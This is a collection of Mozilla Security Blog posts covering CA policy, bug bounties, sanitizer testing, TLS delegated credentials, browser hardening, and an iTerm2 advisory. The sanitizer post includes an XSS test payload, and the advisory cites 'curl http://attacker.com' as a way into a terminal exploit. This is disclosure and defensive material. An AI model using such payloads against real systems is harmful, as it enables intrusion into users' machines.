Announcing Version 2.7 of the Mozilla Root Store Policy

After many months of discussion on the mozilla.dev.security.policy mailing list, our Root Store Policy governing Certificate Authorities (CAs) that are trusted in Mozilla products has been updated. Version 2.7 has an effective date of January 1st, 2020.

More than one dozen issues were addressed in this update, including the following changes:

  • Beginning on 1-July, 2020, end-entity certificates MUST include an Extended Key Usage (EKU) extension containing KeyPurposeId(s) describing the intended usage(s) of the certificate, and the EKU extension MUST NOT contain the KeyPurposeId anyExtendedKeyUsage. This requirement is driven by the issues we’ve had with non-TLS certificates that are technically capable of being used for TLS. Some CAs have argued that certificates not intended for TLS usage are not required to comply with TLS policies, however it is not possible to enforce policy based on intention alone.
  • Certificate Policy and Certificate Practice Statement (CP/CPS) versions dated after March 2020 can’t contain blank sections and must – in accordance with RFC 3647 – only use “No Stipulation” to mean that no requirements are imposed. That term cannot be used to mean that the section is “Not Applicable”. For example, “No Stipulation” in section 3.2.2.6 “Wildcard Domain Validation” means that the policy allows wildcard certificates to be issued.
  • Section 8 “Operational Changes” will apply to unconstrained subordinate CA certificates chaining up to root certificates in Mozilla’s program.  With this change, any new unconstrained subordinate CA certificates that are transferred or signed for a different organization that doesn’t already have control of a subordinate CA certificate must undergo a public discussion before issuing certificates.
  • We’ve seen a number of instances in which a CA has multiple policy documents and there is no clear way to determine which policies apply to which certificates. Under our new policy, CAs must provide a way to clearly determine which CP/CPS applies to each root and intermediate certificate. This may require changes to CA’s policy documents.
  • Mozilla already has a “required practice” that forbids delegation of email validation to third parties for S/MIME certificates. With this update, we add this requirement to our policy. Specifically, CAs must not delegate validation of the domain part of an email address to a third party.
  • We’ve also added specific S/MIME revocation requirements to policy in place of the existing unclear requirement for S/MIME certificates to follow the BR 4.9.1 revocation requirements. The new policy does not include specific requirements on the time in which S/MIME certificates must be revoked.

Other changes include:

  • Detail the permitted signature algorithms and encodings for RSA keys and ECDSA keys in sections 5.1.1 and 5.1.2 (along with a note that Firefox does not currently support RSASSA-PSS encodings).
  • Add the P-521 exclusion in section 5.1 of the Mozilla policy to section 2.3 where we list exceptions to the BRs.
  • Change references to “PITRA” in section 8 to “Point-in-Time Audit”, which is what we meant all along.
  • Update required minimum versions of audit criteria in section 3.1
  • Formally require incident reporting

A comparison of all the policy changes is available here.

A few of these changes may require that CAs revise their CP/CPS(s). Mozilla will send a CA Communication to alert CAs of the necessary changes, and ask CAs to provide the date by which their CP/CPS documents will be compliant.

We have also recently updated the Common CA Database (CCADB) Policy to provide specific guidance to CAs and auditors on audit statements. As a repository of information about publicly-trusted CAs, CCADB now automatically processes audit statements submitted by CAs. The requirements added in section 5.1 of the policy help to ensure that the automated processing is successful.

Help Test Firefox’s built-in HTML Sanitizer to protect against UXSS bugs

Help Test Firefox’s built-in HTML Sanitizer to protect against UXSS bugs

I recently gave a talk at OWASP Global AppSec in Amsterdam and summarized the presentation in a blog post about how to achieve “critical”-rated code execution vulnerabilities in Firefox with user-interface XSS. The end of that blog posts encourages the reader to participate the bug bounty program, but did not come with proper instructions. This blog post will describe the mitigations Firefox has in place to protect against XSS bugs and how to test them.

Our about: pages are privileged pages that control the browser (e.g., about:preferences, which contains Firefox settings). A successful XSS exploit has to bypass the Content Security Policy (CSP), which we have recently added but also our built-in XSS sanitizer to gain arbitrary code execution. A bypass of the sanitizer without a CSP bypass is in itself a severe-enough security bug and warrants a bounty, subject to the discretion of the Bounty Committee. See the bounty pages for more information, including how to submit findings.

How the Sanitizer works

The Sanitizer runs in the so-called “fragment parsing” step of innerHTML. In more detail, whenever someone uses innerHTML (or similar functionality that parses a string from JavaScript into HTML) the browser builds a DOM tree data structure. Before the newly parsed structure is appended to the existing DOM element our sanitizer intervenes. This step ensures that our sanitizer can not mismatch the result the actual parser would have created – because it is indeed the actual parser.

The line of code that triggers the sanitizer is in nsContentUtils::ParseFragmentHTML and nsContentUtils::ParseFragmentXML. This aforementioned link points to a specific source code revision, to make hotlinking easier. Please click the file name at the top of the page to get to the newest revision of the source code.

The sanitizer is implemented as an allow-list of elements, attributes and attribute values in nsTreeSanitizer.cpp. Please consult the allow-list before testing.

Finding a Sanitizer bypass is a hunt for Mutated XSS (mXSS) bugs in Firefox – Unless you find an element in our allow-list that has recently become capable of running script.

How and where to test

A browser is a complicated application which consists of millions of lines of code. If you want to find new security issues, you should test the latest development version. We often times rewrite lots of code that isn’t related to the issue you are testing but might still have a side-effect. To make sure your bug is actually going to affect end users, test Firefox Nightly. Otherwise, the issues you find in Beta or Release might have already been fixed in Nightly.

Sanitizer runs in all privileged pages

Some of Firefox’s internal pages have more privileges than regular web pages. For example about:config allows the user to modify advanced browser settings and hence relies on those expanded privileges.

Just open a new tab and navigate to about:config. Because it has access to privileged APIs it can not use innerHTML (and related functionality like outerHTML and so on) without going through the sanitizer.

Using Developer Tools to emulate a vulnerability

From about:config, open The developer tools console (Go to Tools in the menu bar. Select Web Developers, then Web Console (Ctrl+Shift+k)).

To emulate an XSS vulnerability, type this into the console:

document.body.innerHTML = '<img src=x onerror=alert(1)>'

Observe how Firefox sanitizes the HTML markup by looking at the error in the console:

“Removed unsafe attribute. Element: img. Attribute: onerror.”

You may now go and try other variants of XSS against this sanitizer. Again, try finding an mXSS bug or by identifying an allowed combination of element and attribute which execute script.

Finding an actual XSS vulnerability

Right, so for now we have emulated the Cross-Site Scripting (XSS) vulnerability by typing in innerHTML ourselves in the Web Console. That’s pretty much cheating. But as I said above: What we want to find are sanitizer bypasses. This is a call to test our mitigations.

But if you still want to find real XSS bugs in Firefox, I recommend you run some sort of smart static analysis on the Firefox JavaScript code. And by smart, I probably do not mean eslint-plugin-no-unsanitized.

Summary

This blog post described the mitigations Firefox has in place to protect against XSS bugs. These bugs can lead to remote code execution outside of the sandbox. We encourage the wider community to double check our work and look for omissions. This should be particularly interesting for people with a web security background, who want to learn more about browser security. Finding severe security bugs is very rewarding and we’re looking forward to getting some feedback. If you find something, please consult the Bug Bounty pages on how to report it.

Updates to the Mozilla Web Security Bounty Program

Mozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been. To celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.

Increasing Bounty Payouts

We are doubling all web payouts for critical, core and other Mozilla sites as per the Web and Services Bug Bounty Program page. In addition we are tripling payouts to $15,000 for Remote Code Execution payouts on critical sites!

Adding New Critical Sites to the Program

As we are constantly improving the services behind Firefox, we also need to ensure that sites we consider critical to our mission get the appropriate attention from the security community. Hence we have extended our web bug bounty program by the following sites in the last 6 months:

  • Autograph – a cryptographic signature service that signs Mozilla products.
  • Lando – Mozilla’s new automatic code-landing service which allows us to easily commit Phabricator revisions to their destination repository.
  • Phabricator – a code management tool used for reviewing Firefox code changes.
  • Taskcluster  the task execution framework that supports Mozilla’s continuous integration and release processes (promoted from core to critical).

Adding New Core Sites to the Program

The sites we consider core to our mission have also been extended to include:

  • Firefox Monitor – a site where you can register your email address so that you can be informed if your account details are part of a data breach.
  • Localization – a service contributors can use to help localize Mozilla products.
  • Payment Subscription – a service that is used as the interface in front of the payment provide (Stripe).
  • Firefox Private Network – a site from which you can download a desktop extension that helps secure and protect your connection everywhere you use Firefox.
  • Ship It – a system that accepts requests for releases from humans and translates them into information and requests that our Buildbot-based release automation can process.
  • Speak To Me – Mozilla’s Speech Recognition API.

The new payouts have already been applied to the most recently reported web bugs.

We hope the new sites and increased payments will encourage you to have another look at our sites and help us keep them safe for everyone who uses the web.

Happy Birthday, Firefox. And happy bug hunting to you all!

Adding CodeQL and clang to our Bug Bounty Program

At Github Universe, Github announced the GitHub Security Lab, an initiative to help secure open source software alongside the community and an initial set of partners including Mozilla. As part of this announcement, Github is providing free access to CodeQL, a security research tool which makes it easier to identify flaws in open source software. Mozilla has used these tools privately for the past two years, and have been very impressed and hopeful about how these tools will improve software security. Mozilla recognizes the need to scale security to work automatically, and tighten the feedback loop in the development <-> security auditing/engineering process.

One of the ways we’re supporting this initiative at Mozilla is through renewed investment in automation and static analysis. We think the broader Mozilla community can participate, and we want to encourage it. Today, we’re announcing a new area of our bug bounty program to encourage the community to use the CodeQL tools.  We are exploring the use of CodeQL tools and will award a bounty – above and beyond our existing bounties – for static analysis work that identifies present or historical flaws in Firefox.

The highlights of the bounty are:

  • We will accept static analysis queries written in CodeQL or as clang-based checkers (clang analyzer, clang plugin using the AST API or clang-tidy).
  • Each previously unknown security vulnerability your query matches will be eligible for a bug bounty per the normal policy.
  • The query itself will also be eligible for a bounty, the amount dependent upon the quality of the submission.
  • Queries that match historical issues but do not find new vulnerabilities are eligible. This means you can look through our historical advisories to find examples of issues you can write queries for.
  • Mozilla and Github’s Bug Bounties are compatible not exclusive so if you meet the requirements of both, you are eligible to receive bounties from both. (More details below.)
  • The full details of this program are available at our bug bounty program’s homepage.

When fixing any security bug, retrospective is an important part of the remediation process which should provide answers to the following questions: Was this the only instance of this issue? Is this flaw representative of a wider systemic weakness that needs to be addressed? And most importantly: can we prevent an issue like this from ever occurring again? Variant analysis, driven manually, is usually the way to answer the first two questions. And static analysis, integrated in the development process, is one of the best ways to answer the third.

Besides our existing clang analyzer checks, we’ve made use of CodeQL over the past two years to do variant analysis. This tool allows identifying bugs both in the context of targeted, zero-false-positive queries, and more expansive results where the manual analysis starts from a more complete and less noise-filled point than simple string matching. To see examples of where we’ve successfully used CodeQL, we have a meta tracking bug that illustrates the types of bugs we’ve identified.

We hope that security researchers will try out CodeQL too, and share both their findings and their experience with us. And of course regardless of how you find a vulnerability, you’re always welcome to submit bugs using the regular bug bounty program. So if you have custom static analysis tools, fuzzers, or just the mainstay of grep and coffee – you’re always invited.

Getting Started with CodeQL

Github is publishing a guide covering how to use CodeQL at https://securitylab.github.com/tools/codeql

Getting Started with Clang Analyzer

We currently have a number of custom-written checks in our source tree. So the easiest way to write and run your query is to build Firefox, add ‘ac_add_options –enable-clang-plugin’ to your mozconfig, add your check, and then ‘./mach build’ again.

To learn how to add your check, you can review this recent bug that added a couple of new checks – it shows how to add a new plugin to Checks.inc, ChecksIncludes.inc, and additionally how to add tests. This particular plugin also adds a couple of attributes that can be used in the codebase, which your plugin may or may not need. Note that depending on how you view the diffs, it may appear that the author modified existing files, but actually they copied an existing file, then modified the copy.

Future of CodeQL and clang within our Bug Bounty program

We retain the ability to be flexible. We’re planning to evaluate the effectiveness of the program when we reach $75,000 in rewards or after a year. After all, this is something new for us and for the bug bounty community. We—and Github—welcome your communication and feedback on the plan, especially candid feedback. If you’ve developed a query that you consider more valuable than what you think we’d reward – we would love to hear that. (If you’re keeping the query, hopefully you’re submitting the bugs to us so we can see that we are not meeting researcher expectations on reward.) And if you spent hours trying to write a query but couldn’t get over the learning curve – tell us and show us what problems you encountered!

We’re excited to see what the community can do with CodeQL and clang; and how we can work together to improve on our ability to deliver a browser that answers to no one but you.

Validating Delegated Credentials for TLS in Firefox

At Mozilla we are well aware of how fragile the Web Public Key Infrastructure (PKI) can be. From fraudulent Certification Authorities (CAs) to implementation errors that leak private keys, users, often unknowingly, are put in a position where their ability to establish trust on the Web is compromised. Therefore, in keeping with our mission to create a Web where individuals are empowered, independent and safe, we welcome ideas that are aimed at making the Web PKI more robust. With initiatives like our Common CA Database (CCADB), CRLite prototyping, and our involvement in the CA/Browser Forum, we’re committed to this objective, and this is why we embraced the opportunity to partner with Cloudflare to test Delegated Credentials for TLS in Firefox, which is currently undergoing standardization at the IETF.

As CAs are responsible for the creation of digital certificates, they dictate the lifetime of an issued certificate, as well as its usage parameters. Traditionally, end-entity certificates are long-lived, exhibiting lifetimes of more than one year. For server operators making use of Content Delivery Networks (CDNs) such as Cloudflare, this can be problematic because of the potential trust placed in CDNs regarding sensitive private key material. Of course, Cloudflare has architectural solutions for such key material but these add unwanted latency to connections and present with operational difficulties. To limit exposure, a short-lived certificate would be preferable for this setting. However, constant communication with an external CA to obtain short-lived certificates could result in poor performance or even worse, lack of access to a service entirely.

The Delegated Credentials mechanism decentralizes the problem by allowing a TLS server to issue short-lived authentication credentials (with a validity period of no longer than 7 days) that are cryptographically bound to a CA-issued certificate. These short-lived credentials then serve as the authentication keys in a regular TLS 1.3 connection between a Firefox client and a CDN edge server situated in a low-trust zone (where the risk of compromise might be higher than usual and perhaps go undetected). This way, performance isn’t hindered and the compromise window is limited. For further technical details see this excellent blog post by Cloudflare on the subject.

See How The Experiment Works

We will soon test Delegated Credentials in Firefox Nightly via an experimental addon, called TLS Delegated Credentials Experiment. In this experiment, the addon will make a single request to a Cloudflare-managed host which supports Delegated Credentials. The Delegated Credentials feature is disabled in Firefox by default, but depending on the experiment conditions the addon will toggle it for the duration of this request. The connection result, including whether Delegated Credentials was enabled or not, gets reported via telemetry to allow for comparative study. Out of this we’re hoping to gain better insights into how effective and stable Delegated Credentials are in the real world, and more importantly, of any negative impact to user experience (for example, increased connection failure rates or slower TLS handshake times). The study is expected to start in mid-November and run for two weeks.

For specific details on the telemetry and how measurements will take place, see bug 1564179.

See The Results In Firefox

You can open a Firefox Nightly or Beta window and navigate to about:telemetry. From here, in the top-right is a Search box, where you can search for “delegated” to find all telemetry entries from our experiment. If Delegated Credentials have been used and telemetry is enabled, you can expect to see the count of Delegated Credentials-enabled handshakes as well as the time-to-completion of each. Additionally, if the addon has run the test, you can see the test result under the “Keyed Scalars” section.

Delegated Credentials telemetry in Nightly 72

Delegated Credentials telemetry in Nightly 72

You can also read more about telemetry, studies, and Mozilla’s privacy policy by navigating to about:preferences#privacy.

See It In Action

If you’d like to enable Delegated Credentials for your own testing or use, this can be done by:

  1. In a Firefox Nightly or Beta window, navigate to about:config.
  2. Search for the “security.tls.enable_delegated_credentials” preference – the preference list will update as you type, and “delegated” is itself enough to find the correct preference.
  3. Click the Toggle button to set the value to true.
  4. Navigate to https://dc.crypto.mozilla.org/
  5. If needed, toggling the value back to false will disable Delegated Credentials.

Note that currently, use of Delegated Credentials doesn’t appear anywhere in the Firefox UI. This will change as we evolve the implementation.

We would sincerely like to thank Christopher Patton, fellow Mozillian Wayne Thayer, and the Cloudflare team, particularly Nick Sullivan and Watson Ladd for helping us to get to this point with the Delegated Credentials feature. The Mozilla team will keep you informed on the development of this feature for use in Firefox, and we look forward to sharing our results in a future blog post.

 

 

 

Improved Security and Privacy Indicators in Firefox 70

The upcoming Firefox 70 release will update the security and privacy indicators in the URL bar.

In recent years we have seen a great increase in the number of websites that are delivered securely via HTTPS. At the same time, privacy threats have become more prevalent on the web and Firefox has shipped new technologies to protect our users against tracking.

To better reflect this new environment, the updated UI takes a step towards treating secure HTTPS as the default method of transport for websites, instead of a way to identify website security. It also puts greater emphasis on user privacy.

This post will outline the major changes to our primary security indicators:

  • A new permanent “protections” icon to access information about the restrictions Firefox is applying to the page to protect your privacy.
  • A new crossed-out lock icon as indicator for insecure HTTP and a new color for the lock icon that marks sites delivered securely.
  • A new placement for Extended Validation (EV) indicators.

 

Streamlining Security and Identity Indicators

Firefox traditionally marked sites delivered via a secure transport mechanism with a green lock icon. Sites delivered via insecure mechanisms got no additional security indicators. All sites were marked with an “information” icon, which served as an access point for more site information.

Before and after comparison of new identity icons

As part of the changes in Firefox 70, we will start showing a crossed-out lock icon as permanent indicator for sites delivered via the insecure protocols HTTP and FTP. Over two years ago, we started showing this indicator for insecure login pages. We also announced our intent to expand by showing a negative indicator for all HTTP pages as HTTPS adoption increases. By now, Firefox loads about 80% of pages via HTTPS.

The formerly green lock icon will now become gray, with the intention of de-emphasizing the default (secure) connection state and instead putting more emphasis on broken or insecure connections.

We will remove the “information” icon. The lock icon will be the new entry point for accessing security and identity information about the website.

 

Moving the EV indicator out of the URL Bar

A recent study by Thompson et al. shows that the display of the company name and country in the URL bar when the website is using an Extended Validation TLS certificate does not add any additional security parameters. One of the biggest downsides with this approach is that it requires the user to notice the absence of the EV indicator on a malicious site. Furthermore, it has been demonstrated that EV certificates with colliding entity names can be generated by choosing a different jurisdiction.

As a result, we will relocate the EV indicator to the “Site Information” panel that is accessed by clicking on the lock icon. This change will hide the indicator from the majority of our users while keeping it accessible for those who need to access it. It also avoids ambiguities that could previously arise when the entity name in the URL bar was cut off to make space for the URL.

Image showing the new EV Indicator in the identity panel

 

Adding a new Protections Icon

The protections icon will be the entry point for the privacy properties of every page. It lets the user know about trackers or cryptominers on the page and how Firefox restricts them to improve privacy and performance. The icon will have 3 different states.

An overview of the different protection icons

Protections Enabled
When no tracking activity is detected and protections are not necessary, the shield shows in grey.

Protections Active
When protections are active on the current page, the shield displays a very subtle animation and adopt the purple gradient.

Protections Disabled
When the user has disabled protections for the site, the shield shows with a strike-through.

 

We are excited to roll out this improved new UI and will continue to evolve the indicators to give Firefox users an easy way to assess their privacy and security anywhere on the modern web.

A big thank you to all the individuals that contributed to this effort.

Hardening Firefox against Injection Attacks

A proven effective way to counter code injection attacks is to reduce the attack surface by removing potentially dangerous artifacts in the codebase and hence hardening the code at various levels. To make Firefox resilient against such code injection attacks, we removed occurrences of inline scripts as well as removed eval()-like functions.

Removing Inline Scripts and adding Guards to prevent Inline Script Execution

Firefox not only renders web pages on the internet but also ships with a variety of built-in pages, commonly referred to as about:pages. Such about: pages provide an interface to reveal internal state of the browser. Most prominently, about:config, which exposes an API to inspect and update preferences and settings which allows Firefox users to tailor their Firefox instance to their specific needs.

Since such about: pages are also implemented using HTML and JavaScript they are subject to the same security model as regular web pages and therefore not immune against code injection attacks. More figuratively, if an attacker manages to inject code into such an about: page, it potentially allows an attacker to execute the injected script code in the security context of the browser itself, hence allowing the attacker to perform arbitrary actions on the behalf of the user.

To better protect our users and to add an additional layer of security to Firefox, we rewrote all inline event handlers and moved all inline JavaScript code to packaged files for all 45 about: pages. This allowed us to apply a strong Content Security Policy (CSP) such as ‘default-src chrome:’ which ensures that injected JavaScript code does not execute. Instead JavaScript code only executes when loaded from a packaged resource using the internal chrome: protocol. Not allowing any inline script in any of the about: pages limits the attack surface of arbitrary code execution and hence provides a strong first line of defense against code injection attacks.

Removing eval()-like Functions and adding Runtime Assertions to prevent eval()

The JavaScript function eval(), along with the similar ‘new Function’ and ‘setTimeout()/setInterval()’, is a powerful yet dangerous tool. It parses and executes an arbitrary string in the same security context as itself. This execution scheme conveniently allows executing code generated at runtime or stored in non-script locations like the Document-Object Model (DOM). The downside however is that ‘eval()’ introduces significant attack surface for code injection and we discourage its use in favour of safer alternatives.

To further minimize the attack surface in Firefox and discourage the use of eval() we rewrote all use of ‘eval()’-like functions from system privileged contexts and from the parent process in the Firefox codebase. Additionally we added assertions, disallowing the use of ‘eval()’ and its relatives in system-privileged script contexts.

Unexpectedly, in our effort to monitor and remove all eval()-like functions we also encountered calls to eval() outside of our codebase. For some background, a long time ago, Firefox supported a mechanism which allowed you to execute user-supplied JavaScript in the execution context of the browser. Back then this feature, now considered a security risk, allowed you to customize Firefox at start up time and was called userChrome.js. After that mechanism was removed, users found a way to accomplish the same thing through a few other unintended tricks. Unfortunately we have no control of what users put in these customization files, but our runtime checks confirmed that in a few rare cases it included eval. When we detect that the user has enabled such tricks, we will disable our blocking mechanism and allow usage of eval().

Going forward, our introduced eval() assertions will continue to inform the Mozilla Security Team of yet unknown instances of eval() which we will closely audit and evaluate and restrict as we further harden the Firefox Security Landscape.

For the Mozilla Security Team,
Vinothkumar Nagasayanan, Jonas Allmann, Tom Ritter, and Christoph Kerschbaumer

 

Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat. All users of iTerm2 should update immediately to the latest version (3.3.6) which has been published concurrent with this blog post.

Founded in 2015, MOSS broadens access, increases security, and empowers users by providing catalytic support to open source technologists. Track III of MOSS — created in the wake of the 2014 Heartbleed vulnerability — supports security audits for widely used open source technologies like iTerm2. Mozilla is an open source company, and the funding MOSS provides is one of the key ways that we continue to ensure the open source ecosystem is healthy and secure.

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers. MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Proof-of-Concept video of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.

Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.

An update to iTerm2 is now available with a mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6. A prior update was published earlier this week (3.3.5),  it does not contain the fix.

If you’d like to apply for funding or an audit from MOSS, you can find application links on the MOSS website.

Protecting our Users in Kazakhstan

Russian translation: Если вы хотите ознакомиться с этим текстом на русском языке, нажмите здесь.

Kazakh translation: Бұл постыны қазақ тілінде мына жерден оқыңыз.

In July, a Firefox user informed Mozilla of a security issue impacting Firefox users in Kazakhstan: They stated that Internet Service Providers (ISPs) in Kazakhstan had begun telling their customers that they must install a government-issued root certificate on their devices. What the ISPs didn’t tell their customers was that the certificate was being used to intercept network communications. Other users and researchers confirmed these claims, and listed 3 dozen popular social media and communications sites that were affected.

The security and privacy of HTTPS encrypted communications in Firefox and other browsers relies on trusted Certificate Authorities (CAs) to issue website certificates only to someone that controls the domain name or website. For example, you and I can’t obtain a trusted certificate for www.facebook.com because Mozilla has strict policies for all CAs trusted by Firefox which only allow an authorized person to get a certificate for that domain. However, when a user in Kazakhstan installs the root certificate provided by their ISP, they are choosing to trust a CA that doesn’t have to follow any rules and can issue a certificate for any website to anyone. This enables the interception and decryption of network communications between Firefox and the website, sometimes referred to as a Monster-in-the-Middle (MITM) attack.

We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism.  When attempting to access a website that responds with this certificate, Firefox users will see an error message stating that the certificate should not be trusted.

We encourage users in Kazakhstan affected by this change to research the use of virtual private network (VPN) software, or the Tor Browser, to access the Web. We also strongly encourage anyone who followed the steps to install the Kazakhstan government root certificate to remove it from your devices and to immediately change your passwords, using a strong, unique password for each of your online accounts.

Web Authentication in Firefox for Android

Firefox for Android (Fennec) now supports the Web Authentication API as of version 68. WebAuthn blends public-key cryptography into web application logins, and is our best technical response to credential phishing. Applications leveraging WebAuthn gain new  second factor and “passwordless” biometric authentication capabilities. Now, Firefox for Android matches our support for Passwordless Logins using Windows Hello. As a result, even while mobile you can still obtain the highest level of anti-phishing account security.

Firefox for Android uses your device’s native capabilities: On certain devices, you can use built-in biometrics scanners for authentication. You can also use security keys that support Bluetooth, NFC, or can be plugged into the phone’s USB port.

The attached video shows the usage of Web Authentication with a built-in fingerprint scanner: The demo website enrolls a new security key in the account using the fingerprint, and then subsequently logs in using that fingerprint (and without requiring a password).

Adoption of Web Authentication by major websites is underway: Google, Microsoft, and Dropbox all support WebAuthn via their respective Account Security Settings’ “2-Step Verification” menu.

A few notes

For technical reasons, Firefox for Android does not support the older, backwards-compatible FIDO U2F Javascript API, which we enabled on Desktop earlier in 2019. For details as to why, see bug 1550625.

Currently Firefox Preview for Android does not support Web Authentication. As Preview matures, Web Authentication will be joining its feature set.